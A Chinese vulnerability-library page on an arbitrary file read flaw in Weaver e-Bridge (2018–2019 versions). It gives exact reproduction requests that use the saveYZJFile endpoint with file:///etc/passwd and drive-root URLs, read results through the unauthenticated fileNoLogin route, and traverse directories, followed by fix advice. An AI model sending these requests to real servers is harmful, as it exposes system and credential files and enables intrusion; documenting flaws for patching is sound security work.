泛微云桥(e-Bridge)任意文件读取–好菜一男的-漏洞文库小世界-安全文库-NGC660 安全实验室

泛微云桥(e-Bridge)任意文件读取–好菜一男的

漏洞影响版本

2018-2019多个版本

漏洞复现

第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串,如果响应为200返回包中含有No such file or directory则说明这是linux系统,需要使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt来获取id值
第二步:通过id值获取文件内容(/file/fileNoLogin/id) 1、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,获取id值
1607911428278-b7b4dd6c-4ede-4fdd-8674-e40cb5ed45bf

2、通过查看文件接口访问 /file/fileNoLogin/id
1607911447565-a6c111f5-2133-4d44-b441-d709e1150581

3、downloadUrl参数填写目录的绝对路径时,可以造成目录遍历
访问D盘:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt
1607911478707-7f424f58-b7b0-4b7e-9fa8-29fb7c54b860

修复建议

1.关闭程序路由 /file/fileNoLogin
2.升级到最新版本

请登录后发表评论

    请登录后查看回复内容